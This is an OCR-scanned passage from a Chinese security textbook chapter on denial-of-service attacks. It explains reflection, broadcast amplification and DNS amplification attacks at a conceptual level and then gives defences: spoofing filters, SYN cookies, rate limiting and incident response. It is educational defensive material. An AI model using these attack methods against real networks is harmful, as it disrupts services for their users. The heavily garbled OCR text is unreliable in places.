为 被 发 现 的 概率 ， 攻 击 者 关心 发 送 给 中 间 媒 介 的 通信 流量 大 小 ， 确 保 通 信 流 量 不 能 太 大 而 被 网 
络 管理 员 所 察觉 。 这 是 因为 持续 发 挥 作 用 是 这 种 攻击 的 一 个 重要 项 ， 而 且 这 也 降低 了 攻击 行 
为 被 检测 到 的 概率 。 在 2002 年 ，GRC.com 曾 受 到 这 种 类 型 的 攻击 。 攻 击 者 将 核心 路 由 器 作为 
主要 的 中 间 媒 介 ， 并 发 送 连 接 请 求 给 运行 在 核心 路 由 右上 的 BGP 路 由 服务 。 所 产生 的 大 量 响 
应 数据 包 涌 回 GRC.com， 面 对 洪水 般 的 啊 应 数据 包 ，GRC.com 网 络 服务 完全 瘫痪 。 然 而 ， 据 
GRC.com 所 发 现 的 ， 屏 蔽 了 这 类 流量 后 ， 很 多 其 他 中 间 媒 介 上 的 其 他 类 型 的 服务 也 被 利用 了 。 
GRC 在 有 关 这 类 攻击 的 报告 中 称 :“ 当 数据 包产 狂 地 消 向 你 的 时 候 ， 你 知道 你 遇 到 厅 烦 了 。” 

任何 常用 的 TCP 服务 都 可 以 被 用 来 进行 这 类 反射 攻击 。 我 们 都 知道 Internet 上 存在 着 大 量 
的 可 用 服务 器 ， 包 括 很 多 具有 很 高 容量 的 网 络 链 路 ， 也 就 是 说 存在 大 量 的 可 用 中 间 媒 介 。 由 
于 单个 的 TCP 连接 请 求 攻击 很 难 从 正常 的 TCP 连接 请 求 中 被 区 分 出 来 ， 使 得 这 类 攻击 更 加 有 
效 。 如 果 在 中 间 媒 介 上 安装 某 些 形式 的 入 侵 检 测 系统 就 好 了 ， 这 样 在 发 现 大 量 的 来 自 同一 个 地 
址 的 失败 连接 消息 后 ， 中 间 媒 介 就 可 以 迅速 地 察觉 到 这 种 攻击 并 屏蔽 掉 该 类 数据 包 。 如 果 攻 击 
者 利用 多 个 中 间 媒 介 ， 即 使 其 中 一 些 中 间 媒 介 检 测 到 了 这 种 攻击 并 屏蔽 了 此 类 流量 ， 但 攻击 者 


O ”字符 发 生 器 协议 是 字符 发 生 需 诊断 服务 ， 它 会 同 连 接 到 服务 器 的 客户 端 返 回 一 个 字符 流 。 域 名 服务 
(Domain Name Service, DNS) 是 用 来 对 域名 和 1IP 地 址 进行 相互 翻译 的 。 简 单 网 络 管理 协议 (Simple 
Network Mangement Protocol, SNMP) 是 通过 发 送 询问 获得 响应 ， 来 管理 网 络 设备 的 协议 。 互 联网 安全 关联 
和 密 钥 管理 协议 (Internet Security Association and Key Management Protocol, ISAKMP) 在 互联 网 协议 安全 性 
(IP Security Architecture, IPSec) 中 提供 了 密 钥 管理 框架 ， 我 们 在 第 22 章 进 行 这 方面 的 讨论 。 
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还 有 其 他 的 中 间 媒 介 ， 因 而 虽然 攻击 的 效果 会 稍 差 ， 但 攻击 还 是 可 以 达到 一 定 的 预期 效果 的 。 

另 一 种 改进 型 的 反射 攻击 在 中 间 媒 介 和 目标 系统 之 间 建 立 了 一 条 上 自 包 含 的 回路 。 两 个 系 
统 都 被 当 作 反 射 器 。 图 7-6 描述 了 此 类 攻击 。 图 中 上 半 部 分 描述 了 通常 的 DNS ES, DNS 
的 客户 端 从 它 的 端口 1792 利用 UDP 协议 向 DNS 的 端口 53 发 送 查 询 请 求 来 获取 一 个 域名 的 
IP 地 址 。DNS 服务 器 会 发 送 一 个 包含 IP 地 址 的 响应 包 。 图 中 下 半 部 分 展示 了 利用 DNS H 
行 的 反射 攻击 。 攻 击 者 利用 一 个 虚假 的 源 地 址 j.k.l.m 向 DNS 服务 器 发 送 查 询 请 求 ， 这 就 是 
目标 的 IP 地 址 。 攻 击 者 使 用 端口 7， 该 端口 通常 与 echo 相关 联 ， 即 反射 锅 服 务 。DNS 服务 [240 
器 稍 后 会 向 该 攻击 的 受害 者 ， 也 就 是 j.k.lLm 的 端口 7 发 送 一 个 响应 。 如 果 受 害 者 的 机 器 提 
供应 答 协议 服务 ， 它 可 能 会 创建 一 个 网 络 包 将 接收 到 的 数据 返回 给 DNS 服务 器 。 如 果 DNS 
服务 器 响应 了 受害 者 的 机 器 发 送 的 这 个 网 络 包 ， 那 么 会 在 DNS 服务 器 和 受害 者 的 机 器 之 间 
形成 死 循 环 。 基 于 网 络 和 基于 主机 的 防火 墙 将 规则 设置 为 拒绝 这 类 可 疑 端口 交换 信息 ， 便 可 
阻止 绝 大 多 数 的 反射 攻击 。 
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图 7-6 DNS 反射 攻击 


在 可 能 的 情况 下 这 种 攻击 是 相当 有 效 的 ， 但 很 容易 被 过 滤 掉 ， 因 为 在 正常 的 网 络 通信 操作 
中 不 会 使 用 这 类 服务 端口 。 

当 进行 任意 类 型 的 反射 攻击 时 ， 攻 击 者 仅仅 需要 一 个 系统 作为 构造 最 初 的 数据 包 的 源 。 这 
是 足够 的 ， 特 别 是 当 服务 所 产生 的 啊 应 数据 包 大 大 超过 攻击 者 开始 发 送 给 中 间 媒 介 的 数据 包 的 
数量 时 。 对 于 利用 多 机 系统 的 攻击 ， 多 个 系统 可 以 发 送 更 多 的 攻击 数据 包 给 中 间 媒 介 ， 这 样 可 
以 更 好 地 隐藏 攻击 者 ， 躲 避 跟 踪 。 一 般 攻 击 者 会 选择 僵尸 网 络 。 

反射 攻击 的 为 一 个 特性 是 它 没有 反问 散射 流量 。 在 直接 洪 泛 攻击 和 SYN 欺骗 攻击 中 ， 由 
于 虚假 的 源 地 址 的 使 用 ， 使 得 啊 应 数据 包 以 发 散 状 的 形式 发 散 到 Internet 上 ， 因 而 很 容易 被 检 
测 到 ， 而 且 也 给 安全 分 析 人 员 进 行 流量 分 析 提 供 了 可 能 。 在 反射 攻击 中 ， 这 个 所 谓 的 虚假 源 地 
址 其 实 是 目标 系统 的 地 址 ， 而 且 啊 应 数据 包 来 自 中 间 媒 介 ， 并 没有 明显 的 迹象 表明 这 种 攻击 的 
存在 ， 这 使 得 攻击 行为 很 难 被 察觉 。 只 有 在 目标 系统 、ISP 路 由 天 和 中 间 媒 介 系 统 上 的 流量 特 
征 才能 作为 攻击 检测 的 依据 。 这 就 需要 特定 的 设备 和 监视 手段 来 收集 有 用 的 证 据 。 

成 功 进行 反射 攻击 的 基本 要 求 是 能 够 生成 带 有 虚假 源 地 址 的 数据 包 。 如 果 过 滤 需 放置 在 适 
当 的 位 置 ， 如 (RFC 2827 ) 中 描述 的 那样 ， 能 够 屏蔽 虚假 源 地 址 数据 包 ， 那 么 这 种 攻击 也 就 不 ”[241 
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存在 了 。 过 滤 数 据 包 也 是 抵御 反射 攻击 的 最 基本 的 方式 ， 这 不 同 于 SYN 欺骗 攻击 或 洪 泛 攻击 
(分 布 式 的 或 非 分 布 式 的 )。 它 们 可 以 利用 真实 的 源 地 址 而 获得 成 功 ， 其 结果 前 面 已 经 提 到 了 了， 


7.5.2 ”放大 攻击 


放大 攻击 是 反射 攻击 的 一 个 变种 ， 它 同样 是 发 送 带 有 虚假 源 地 址 的 数据 包 给 中 间 媒 介 。 不 
同 的 是 中 间 媒 介 对 每 个 来 自 攻 击 者 的 初始 数据 包 会 产生 多 个 啊 应 数据 包 。 攻 击 者 可 以 发 送 初始 
请 求 数据 包 到 某 些 网 络 的 广播 地 址 ， 那 么 这 个 网 络 上 的 所 有 主机 都 可 能 会 对 数据 包 中 源 地 址 所 
指 回 的 主机 进行 啊 应 ， 也 就 是 说 这 些 主机 将 会 形成 一 个 如 图 7-7 所 描述 的 啊 应 数据 包 洪 泛 流 。 
实施 放大 攻击 需要 某 个 网 络 上 的 大 部 分 主机 都 提供 网 络 处 理 服务 。 由 于 基于 ICMP 回 送 请 求 数 
据 包 的 ping 服务 是 TCP/IP 协议 的 基本 功能 ， 而 且 网 络 运 营 商 通 常会 允许 ping 数据 包 进 入 其 网 
络 ， 因 此 攻击 者 一 般 会 选择 ping 洪 泛 攻击 。 闭 名 的 Smurf DoS 程序 就 采用 这 种 机 制 并 风 麻 一 
时 。 另 一 种 可 能 的 选择 是 适当 的 UDP 服务 ， 如 回 送 服 务 等 。Fraggle 程序 就 是 这 种 模式 的 攻击 。 
注意 ，TCP 服务 则 不 能 用 于 这 种 攻击 ， 因 为 TCP 服务 是 面向 连接 的 ， 其 目的 地 址 不 能 是 广播 
地 址 。 广 播 本 质 上 是 无 连接 的 。 
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图 7-7 放大 攻击 


抵御 放大 攻击 的 最 好 的 补充 措施 就 是 不 允许 定向 广播 由 外 部 进入 网 络 ， 而 且 这 也 是 一 种 
长 久 的 安全 建议 。 但 不 幸 的 是 ， 同 屏蔽 虚假 源 地 址 的 建议 一 样 ， 这 条 安全 建议 并 没有 被 广泛 采 
纳 和 实施 。 如 有 果 能 够 在 合适 的 位 置 放置 屏蔽 广播 数据 包 的 过 滤 硕 ， 那 么 这 种 放大 攻击 将 晶 无 用 
处 。 男 一 个 抵御 放大 攻击 的 措施 是 限制 回 送 或 ping 等 网 络 服务 被 组 织 外 部 访问 。 然 而 限制 这 
类 服务 的 代价 就 是 无 法 进行 正常 的 网 络 故障 分 析 。 

攻击 者 通过 扫描 整个 Pnternet， 寻 找 那些 网 络 连接 良好 、 人 允许 定向 广播 的 可 执行 攻击 的 网 
络 ， 形 成 一 个 可 用 网 络 列表 。 这 个 网 络 列表 可 被 交换 并 用 于 实施 这 种 攻击 。 


7.5.3 DNS 放大 攻击 


反射 攻击 或 放大 攻击 的 另 一 个 变种 是 将 DNS 服务 器 作为 中 间 媒 介 系 统 ， 其 使 用 了 直接 
指向 合法 DNS 服务 器 的 数据 包 进 行 攻 击 。 攻 击 者 利用 DNS 协议 将 较 小 的 请 求 数据 包 转 化 为 较 
大 的 响应 数据 包 而 达到 攻击 效果 。 这 种 类 型 的 放大 攻击 与 传统 的 利用 多 个 主机 产生 大 量 的 啊 应 
数据 包 的 放大 攻击 有 着 明显 的 不 同 。 利 用 标准 的 DNS 协议 ， 一 个 60 HY UDP 请 求 数据 
包 可 以 很 容易 地 生成 一 个 512 字 节 (传统 网 络 上 一 个 数据 包 所 允许 的 最 大 字 节 数 ) 的 UDP 响 
应 包 。 而 仅仅 需要 一 个 有 着 足够 大 数量 的 DNS 记录 的 域名 服务 器 就 可 以 完成 其 攻击 过 程 。 

这 种 利用 域名 服务 器 的 攻击 已 经 出 现 了 一 段 时 间 。 如 今 ，DNS 协议 为 了 支持 IPv6 、 安 全 
性 等 扩展 的 DNS 特征 ， 已 经 扩展 到 允许 一 个 数据 包 的 大 小 超过 4000 字 节 。 如 果 所 利用 的 中 间 
媒介 系统 (域名 服务 器 ) 支持 扩展 的 DNS 协议 的 话 ， 那 么 攻击 者 就 可 以 制造 出 明显 强 于 利用 
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经 典 的 DNS 协议 的 放大 攻击 。 

在 DNS 放大 攻击 中 ， 攻 击 者 常常 选择 那些 网 络 连接 性 能 良好 的 DNS 服务 器 。 攻 击 者 构 
造 出 一 系列 源 地 址 为 目标 系统 地 址 的 DNS 请 求 数据 包 ， 并 把 这 些 数据 包 发 送 到 攻击 者 所 选择 
的 域名 服务 器 上 。 这 些 域名 服务 需 在 接收 到 这 些 请 求 包 后 ， 按 照 DNS 协议 ， 会 发 送 相应 数量 
的 啊 应 包 给 目标 系统 ， 这 些 系 统 在 它们 看 来 是 合法 的 请 求 系统 。 目 标 系 统 因 而 被 这 些 啊 应 流量 
所 洪 泛 。 由 于 放大 作用 ， 攻 击 者 只 要 生成 中 等 流量 的 数据 包 就 可 以 形成 更 大 的 、 被 放大 的 数据 
流 ， 使 得 目标 系统 的 网 络 链 路 超 负 荷 。 中 间 媒 介 系 统 上 也 会 产生 明显 的 负载 。 攻 击 者 可 以 选择 
一 定数 量 的 具有 高 性 能 、 良 好 连接 的 系统 实施 攻击 ， 从 而 保证 中 间 媒 介 系 统 不 会 明显 地 超 负 
和 荷 ， 使 得 攻击 可 以 顺利 进行 。 

这 种 攻击 的 更 进一步 变种 则 利用 了 递归 的 域名 服务 器 。DNS 协议 的 一 个 基本 特征 是 允许 
一 个 域名 服务 器 查询 大 量 其 他 域名 服务 器 来 解析 客户 的 查询 。 这 样 做 仅仅 是 为 了 满足 本 地 用 户 
的 请 求 。 然 而 ， 很 多 的 DNS 系统 默认 情况 下 对 任何 请 求 都 支持 递归 查询 ， 这 种 域名 服务 器 被 
称 为 开放 递归 DNS 服务 器 。 攻 击 者 可 以 利用 这 样 的 域名 服务 器 进行 一 系列 的 基于 DNS 服务 的 
攻击 ,包括 DNS 放大 DoS 攻击 。 在 该 变种 中 ， 攻 击 者 以 大 量 的 开放 递归 DNS 服务 器 为 目标 。 
攻击 所 用 的 域名 不 一 定 保 存在 这 些 服 务 器 上 ， 而 是 可 以 来 自 Internet 上 的 任何 位 置 。 查 询 结果 
被 直接 发 送 给 用 虚假 源 地 址 指定 的 期 望 目标 。 

对 付 所 有 基于 反射 机 制 的 攻击 的 基本 方法 是 防止 使 用 虚假 地 址 。DNS 服务 器 的 正确 配置 ， 
尤其 是 限定 仅 对 内 部 客户 系统 提供 递归 响应 ， 如 RFC 5358 中 描述 的 那样 ， 可 以 很 好 地 限制 这 
类 攻击 的 一 些 变种 。 


7.6 ”拒绝 服务 攻击 防范 


有 一 些 步骤 可 以 用 来 降低 成 为 Dos 攻击 对 象 和 被 攻击 者 控制 用 于 DoS 攻击 的 可 能 性 。 不 
过 需要 明确 的 是 ， 我们 不 可 能 完全 预防 DoS 攻击 。 特 别 地 ， 如 果 攻 击 者 可 以 构造 足够 大 的 合 
法 流量 到 达 你 的 系统 ， 那 么 这 个 流量 就 很 有 可 能 会 淹没 你 的 系统 网 络 连接 ， 从 而 限制 其 他 想 连 
接 到 你 的 系统 的 合法 网 络 请 求 。 实 际 上 ， 一 些 知名 度 很 高 的 网 站 常常 会 遇 到 这 种 拒绝 服务 情 
况 。 典 型 地 ， 在 著名 的 Slashdot 新 闻 聚 合 站 点 发 布 一 条 新 闻 经 常会 导致 其 所 引用 的 服务 器 系统 
超人 负 全 。 与 此 类 似 ， 当 有 某 些 受 欢 迎 的 体育 活动 如 奥运 会 或 者 世界 杯 足 球赛 时 ， 报 道 这 些 赛事 
信息 的 网 站 往往 会 承受 很 高 的 网 络 通 信 流 量 。slashdotted、flash crowd 和 flash event 往往 被 用 
来 描述 这 种 网 站 高 负荷 的 现象 。 对 于 这 种 偶然 的 或 者 恶意 的 服务 器 超 负荷 问题 ， 我 们 在 不 降低 
网 络 性 能 的 情况 下 ,没有 很 好 的 解决 办 法 。 第 用 的 抵御 措施 是 提供 显著 过 剩 的 网 络 带 宽 和 内 容 
相同 的 分 布 式 服务 器 。 尤 其 是 当 这 种 超 负荷 情况 可 以 预料 时 。 这 些 措施 已 经 在 一 些 受 欢迎 的 体 
育 网 站 上 实施 了 ， 但 这 种 措施 的 代价 很 高 。 
一 般 ， 抵 御 DDoS 攻击 有 下 面 四 道 防线 [PENGO7, CHANO2]: 
e 攻击 预防 和 先发制人 机 制 (攻击 前 ) : 这 种 机 制 允许 被 攻击 者 能 够 承受 攻击 而 不 拒绝 为 
合法 客户 提供 服务 。 攻 击 预防 技术 包括 执行 资源 消耗 的 策略 ， 根 据 需 求 提 供 后 备 资源 。 
此 外 ， 预 防 机 制 修改 Internet 上 的 系统 和 协议 ,来 减少 DDoS 攻击 的 可 能 性 。 
e 攻击 检测 和 过 滤 (攻击 时 ) : 这 种 机 制 试图 在 攻击 一 开始 就 将 其 检测 出 来 并 迅速 响应 。 
这 样 可 以 使 得 攻击 对 目标 系统 的 影响 最 小 化 。 检 测 工 作 包括 寻找 可 疑 的 行为 模式 ， 响 
应 措施 则 包括 过 滤 掉 某 些 可 能 是 攻击 的 数据 包 。 
e 攻击 源 回溯 和 识别 (攻击 时 和 攻击 后 ) : 试图 识别 攻击 源 ， 通 常 被 作为 预防 未 来 攻击 的 
第 一 步 。 但 这 种 方式 往往 不 能 很 快 地 产生 结果 来 减轻 正在 发 生 的 攻击 。 
e 攻击 反应 (攻击 后 ): 试图 排除 或 消减 攻击 带 来 的 影响 。 
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本 节 我 们 讨论 第 一 道 防线 ， 而 在 7.7 节 中 讨论 其 余 三 道 防线 。 

很 多 的 DoS 攻击 的 关键 性 内 容 是 使 用 虚假 的 源 地 址 。 这 既 可 以 掩盖 直接 或 分 布 式 DoS 攻击 
的 攻击 者 ， 也 可 用 来 将 反射 或 放大 的 网 络 通信 流量 涌 癌 目标 系统 。 因 此 ， 根 本 的 、 长 期 有 效 的 
抵御 DoS 攻击 的 方法 是 限制 主机 系统 发 送 带 有 虚假 源 地 址 数据 包 的 能 力 。RFC 2827， 即 “网 络 
输入 过 滤 : 阻止 利用 卫 源 地 址 伪装 发 动 的 拒绝 服务 攻击 ”( Network Ingress Filtering : Defeating 
Denial-of-service attacks which employ IP Source Address Spoofing S) 直接 做 出 了 这 样 的 推荐 ， 
SANS, CERT 以 及 其 他 的 网 络 安全 相关 组 织 已 经 采纳 了 这 种 方法 。 

过 滤 硕 应 该 尽 可 能 地 接近 数据 包 源 头 ， 放 在 可 以 获得 输入 数据 包 的 有 效 地 址 范围 的 路 由 
佑 或 网 关 附 近 。 典 型 地 ， 为 一 个 组 织 或 家 庭 用 户 提供 网 络 连 接 的 ISP 路 由 器 就 是 可 以 安装 过 滤 
器 的 路 由 器 。 由 于 ISP 熟知 其 所 分 配给 客户 的 IP 地址 ， 因 而 ISP 路 由 器 是 用 来 确认 来 自 其 客 
户 的 数据 包 中 源 地 址 是 否 有 效 的 最 佳 位 置 。 在 路 由 大 上 利用 明确 的 访问 控制 规则 来 确认 来 自 其 
客户 的 所 有 数据 包 上 的 源 地 址 是 否 为 ISP 所 分 配 的 地 址 。 当 然 ， 也 可 以 用 过 滤 需 来 确认 源 地 址 
所 指 癌 的 返回 路 径 是 否 是 当前 数据 包 发 送 过 来 所 使 用 的 路 径 。 例 如 ,在 Cisco 路 由 器 上 使 用 的 
ip verify unicast reverse-path 命令 。 后 一 种 方法 对 某 些 使 用 复杂 的 、 宛 余 的 路 由 设备 的 ISP 不 一 
定 可 行 。 实 现 某 种 形式 的 过 滤 胡 可 以 确保 ISP 用 户 不 能 发 送 带 有 虚假 源 地 址 的 数据 包 。 遗 憾 的 
是 ， 尽 管 这 是 一 个 非常 好 的 建议 ， 但 是 很 多 ISP 并 不 提供 这 类 的 过 滤 服 务 。 特 别 是 那些 有 着 
众多 宽带 上 网 的 家 庭 用 户 的 ISP 更 需要 考虑 这 些 问 题 。 因 为 不 能 像 企业 系统 那样 受到 很 好 的 保 
护 ， 这 些 系统 是 主要 的 攻击 目标 。 一 旦 被 攻击 者 控制 ， 这 些 系 统 又 会 作为 中 间 媒 介 来 实施 其 他 
攻击 ， 如 DoS 攻击 。 这 种 问题 显然 是 由 于 ISP 没有 安装 反 欺 骗 过 滤器 造成 的 。 他 们 通常 不 安 
半 过 滤 需 的 理由 是 安 儿 过 滤 融 后 会 对 路 由 顺 性 能 有 负面 影响 。 过 滤 顺 的 确 会 使 得 路 由 需 承 担 一 
定 的 压力 ， 因 而 不 得 不 处 理 大 量 的 攻击 数据 流量 。 在 当今 Dos 攻击 如 此 流行 的 情况 下 ， 任 何 
ISP 或 组 织 都 没有 任何 理由 不 实施 这 种 基本 安全 建议 。 

尽管 抵御 措施 往往 是 在 被 攻击 后 才 实 施 的 ， 但 所 有 的 抵御 洪 泛 攻击 的 措施 应 该 在 整个 
Internet 上 实施 ， 而 不 仅仅 是 在 单个 组 织 的 边界 路 由 器 上 。 过 滤 需 应 该 被 应 用 于 网 络 流量 离开 
其 ISP 网 络 之 前 ， 或 者 甚至 要 在 其 网 络 的 人 口 点 应 用 。 尽 管 一 般 不 可 能 识别 出 具有 虚假 源 地 址 
的 数据 包 ， 但 是 使 用 反 向 路 径 过 滤器 可 以 帮助 识别 出 从 ISP 到 达 虚 假 源 地 址 的 路 径 不 同 于 其 
BGA ISP 的 路 径 的 数据 包 。 也 可 以 通过 限制 接收 数据 包 的 速率 来 抵御 那些 利用 特殊 数据 包 如 
ICMP 洪 泛 或 针对 诊断 服务 的 UDP 洪 泛 所 进行 的 攻击 。 在 正常 的 网 络 运 行 中 ,这些 特 殊 数 据 
包 是 由 网 络 流量 中 的 一 小 部 分 构成 的 。 很 多 的 路 由 器 ， 尤 其 是 那些 ISP 所 使 用 的 高 端 路 由 器 具 
有 限制 数据 包 接收 速率 的 能 力 。 通 过 合理 设置 该 速率 可 以 有 效 地 减轻 洪 泛 攻击 的 影响 ， 从 而 人 允 
许 其 他 类 型 的 流量 即使 发 生 攻 击 也 能 到 达 目 标 组 织 。 

可 以 使 用 改进 版 本 的 TCP 连接 处 理 程序 来 专门 抵御 SYN 欺骗 攻击 。 把 请 求 连接 的 关键 
信息 加 密 编 码 并 保存 到 cookie 中 ， 而 不 是 保存 在 服务 器 上 ， 然 后 将 这 个 cookie 作为 服务 器 的 
初始 序号 封装 在 SYN-ACK 响应 包 中 发 送 给 客户 端 。 当 合法 用 户 返 回 ACK 应 答 包 时 ， 要 求 在 
ACK 应 答 包 中 包含 序号 加 1 的 cookie， 然 后 服务 需 根 据 这 个 cookie 来 重 构 那 些 曾 经 在 TCP jE 
接 表 中 存储 的 相关 信息 。 当 然 该 技术 一 般 用 于 防止 TCP 连接 表 溢 出 。 其 优点 是 在 三 次 握手 成 
功 之 前 ， 服 务 大 上 不 会 有 内 存 资源 消耗 ， 而 且 服 务 硕 有 足够 的 理由 相信 数据 包 中 的 源 地 址 对 应 
于 一 个 正 与 服务 硕 交 互 的 真实 的 客户 端 。 

当然 这 里 也 有 一 些 缺 点 。 首 先 ， 服 务 需 要 消耗 一 定 的 计算 资源 来 计算 cookie; 其 次 ， 限 


日 ”注意 ,虽然 题目 使 用 了 Ingress Filtering, 但 RFC 实际 上 描述 的 是 Egress Filtering， 我 们 讨论 的 也 是 该 行为 ， 


真正 的 ingress filtering 利用 属于 本 地 网 络 的 源 地 址 来 阻止 外 部 的 数据 包 。 它 只 能 对 一 小 部 分 攻击 提供 防护 。 
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制 了 某 些 TCP 扩展 功能 ， 如 大 窗口 (large window)。 这 些 扩 展 功 能 ， 连 同 其 他 的 请 求 连接 到 
其 他 细节 往往 是 由 服务 器 保存 的 。 然 而 ， 这 些 连 接 信息 太 大 而 不 能 在 cookie 中 被 编码 ， 因 为 
没有 足够 的 空间 。 另 一 种 方法 是 服务 器 完全 拒绝 连接 ， 因 为 没有 剩余 的 资源 管理 这 些 请 求 ， 
这 也 是 系统 在 处 理 高 连接 请 求 接 人 处 理 能 力 方 面 的 改进 。 这 种 方法 是 由 很 多 人 独立 发 明 的 ， 最 
著名 的 一 个 版 本 就 是 SYN cookie， 其 主要 发 明 人 是 Daniel Bernstein。 它 在 最 近 的 FreeBSD 和 
Linux 操作 系统 中 已 经 得 到 应 用 ， 尽 管 不 是 默认 启动 的 。 在 Windows 2000, XP 以 及 以 后 版 本 
中 也 包含 这 种 技术 的 一 个 版 本 。 这 种 技术 可 以 应 用 在 任何 TCP 连接 表 溢 出 的 场合 。 

当 TCP 连接 表 溢 出 时 ， 我 们 可 以 通过 修改 系统 的 TCP/IP 网 络 处 理 程序 来 选择 性 地 丢弃 一 
个 TCP 连接 表 中 不 完全 连接 的 表 项 ， 而 允许 新 的 连接 请 求 。 这 就 是 选择 性 丢弃 或 者 称 为 随机 
EEF. Bit TCP 连接 请 求 表 中 的 表 项 大 部 分 来 自 攻 击 连接 ， 那么 被 丢弃 的 表 项 将 可 能 会 对 
应 着 一 个 攻击 数据 包 ， 因 而 表 项 的 丢弃 对 客户 端 是 没有 影响 的 。 如 果 不 这 样 做 ， 合 法 用 户 的 连 
接 请 求 尝 试 将 无 法 得 到 服务 器 的 啊 应 并 且 只 能 重 试 。 然 而 ， 这 种 策略 确实 在 连接 表 溢出 时 给 新 
连接 提供 了 尝试 机 会 使 其 不 会 被 立即 抛弃 。 

另 一 种 抵御 SYN 欺骗 的 措施 是 修改 TCP/IP 网 络 处 理 程序 中 所 使 用 的 参数 。 这 些 参数 包括 
TCP 连接 表 的 大 小 及 当 未 收 到 响应 时 删除 表 项 的 超时 时 间 。 该 方法 可 以 与 限制 网 络 连接 的 速率 
一 起 用 来 管理 服务 器 所 人 允许 的 最 大 连接 请 求 率 。 尽 管 修 改 参 数 可 以 加 大 攻击 者 攻击 的 难度 ， 但 
是 这 并 不 能 从 根本 上 预防 攻击 。 

抵御 广播 放大 攻击 的 最 好 措施 是 屏蔽 P 定向 广播 的 使 用 。 这 可 以 由 ISP 或 者 那些 被 利用 
作为 中 间 媒 介 的 组 织 来 实现 。 正 如 在 本 章 前 面 所 描述 的 ， 这 个 建议 以 及 反 欺 骗 过 滤器 都 是 长 期 
有 效 的 安全 建议 ， 所 有 的 组 织 都 应 该 贯彻 实施 。 通 常 ， 限 制 或 阻塞 流向 可 疑 服 务 、 源 端口 和 目 
的 端口 组 合 的 网 络 流量 ， 可 以 限制 那些 被 用 来 攻击 某 一 组 织 的 反射 攻击 。 

抵御 以 应 用 程序 资源 为 攻击 目标 的 Dos 攻击 ,一般 要 求 修改 作为 目标 的 应 用 程序 ， 如 
Web 服务 硕 。 抵 御 措 施 可 以 包括 试图 判断 数据 包 是 来 自 合法 的 、 人 工 发 起 的 交互 ， 还 是 来 自 自 
动 DoS 攻击 。 这 可 以 采用 迷宫 图 、captcha 等 形式 ， 这 对 于 大 多 数 人 来 说 很 容易 解决 ， 但 是 对 
于 计算 机 来 说 则 是 一 件 很 困难 的 事情 。 这 种 方法 在 很 多 的 大 型 网 站 上 如 Hotmail、Yahoo 等 已 
经 使 用 。 男 外 ， 应 用 程序 也 可 以 限制 某 种 类 型 的 交互 的 速率 以 持续 提供 某 种 类 型 的 服务 。 部 分 
这 样 的 方案 在 [KAND05] 中 有 说 明 。 

除了 这 些 直 接 抵御 DoS 攻击 的 措施 外 ， 完 整 的 良好 系统 安全 实践 也 是 必需 的 。 这 样 做 的 
目的 是 不 让 目 己 的 主机 被 攻击 者 控制 成 为 僵尸 机 。 对 高 性 能 、 连 接 良 好 的 服务 器 的 合理 配置 和 
监视 ,也 是 保证 这 些 系统 不 被 作为 潜在 的 中 间 媒 介 服 务 器 所 必需 的 。 

最 后 ， 一 个 基于 网 络 服务 的 组 织 应 该 配置 镜像 ， 在 多 个 站 点 上 复制 出 多 个 同样 的 、 具 有 多 
条 网 络 连接 的 服务 器 。 这 是 一 种 很 好 的 实践 方案 ， 可 以 提供 更 高 级 别 的 稳定 性 和 容错 能 力 ， 而 
不 仅仅 是 简单 的 DoS 攻击 响应 措施 。 


7.7 ”对 拒绝 服务 攻击 的 响应 


为 了 成 功 地 响应 DoS 攻击 ， 一 个 良好 的 偶然 事件 响应 计划 是 必需 的 。 这 就 应 该 包括 如 何 
联系 你 的 Internet 服务 提供 商 的 技术 人 员 。 因 为 在 受到 攻击 的 情况 下 ， 网 络 可 能 是 无 法 正常 运 
行 的 ， 所 以 可 能 必须 使 用 非 网 络 连接 的 联系 方式 。DoS 攻击 ， 尤 其 是 洪 泛 攻 击 ， 所 产生 的 流量 
— top SAY ARS ARA EITE PR et, Me eS te FT OG AY A lg 7 
a 织 人 员 和 ISP 方面 的 责任 划分 的 依据 是 组 织 的 可 用 资源 和 技术 能 力 。 

DAR 应 该 已 经 实施 了 或 安装 了 标准 的 反 欺 骗 、 定 向 广播 和 速率 限制 过 滤器 ， 这 些 
IR aa ate FE. MERS 下 ， 还 应 该 法 有 某 种 形式 的 网 络 自 动 监视 和 和信 侵 检测 系 
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统 ， 从 而 在 遇 到 异常 数据 时 ， 可 以 很 快 地 检测 到 。 我 们 将 在 第 8 章 讨论 这 种 系统 。 关 于 如 何 最 
佳 识 别 异 党 流量 的 研究 工作 一 直 在 进行 。 识 别 异 常 流量 可 以 基于 流 信息 、 源 地 址 或 者 其 他 流量 
特征 的 模式 的 变化 ,正如 [CARL06] 中 所 论述 的 。 对 于 一 个 组 织 来 说 ， 了 解 自 己 的 正常 网 络 流 
量 模式 信息 是 很 重要 的 ， 因 为 这 个 组 织 可 以 明确 自己 的 网 络 流量 特征 基线 ， 从 而 快速 地 检测 出 
异常 数据 流 。 如 果 没 有 这 样 的 系统 和 理论 基础 的 话 ， 最 早 的 攻击 提示 应 该 只 能 是 来 自 内 部 或 外 
部 用 户 的 关于 其 网 络 连接 失败 的 报告 了 。 判 定 出 这 个 网 络 连 接 失 败 是 由 于 攻击 、 错 误 的 网 络 配 
置 、 硬 件 故障 还 是 软件 问题 引起 的 ， 会 花费 很 多 时 间 。 

当 检 测 到 一 次 DoS 攻击 ， 我 们 首先 要 做 的 事情 是 判定 出 这 次 攻击 的 类 型 ， 并 选择 一 个 最 
佳 的 方法 来 抵御 这 次 攻击 。 通 常 这 个 过 程 应 该 包括 : 数据 包 的 捕获 、 数 据 包 的 分 析 、 寻 找 常 见 
的 攻击 数据 包 类 型 。 该 过 程 一 般 由 组 织 的 人 员 利 用 合适 的 网 络 分 析 工 具 来 完成 。 如 果 组 织 缺 乏 
这 个 过 程 所 需要 的 资源 或 技术 ， 那么 这 就 需要 该 组 织 的 ISP 服务 提供 商 完成 捕获 和 分 析 工 作 。 
通过 这 样 的 分 析 ， 我 们 就 可 以 判定 出 所 受到 攻击 的 类 型 ， 并 合理 配置 过 滤器 来 过 滤 掉 这 些 攻击 
数据 包 。 以 上 所 用 到 的 工具 都 需要 ISP 服务 提供 商 安 装 到 路 由 器 上 。 如 果 攻 击 者 的 对 象 是 目标 
系统 或 应 用 程序 的 一 个 缺陷 ， 而 不 是 通过 高 流量 的 数据 包 造 成 网 络 阻塞 ， 那 么 这 种 情况 下 就 要 
求 管 理 者 能 够 及 时 地 发 现 这 个 缺陷 并 修复 它 ， 以 阻止 将 来 的 攻击 。 

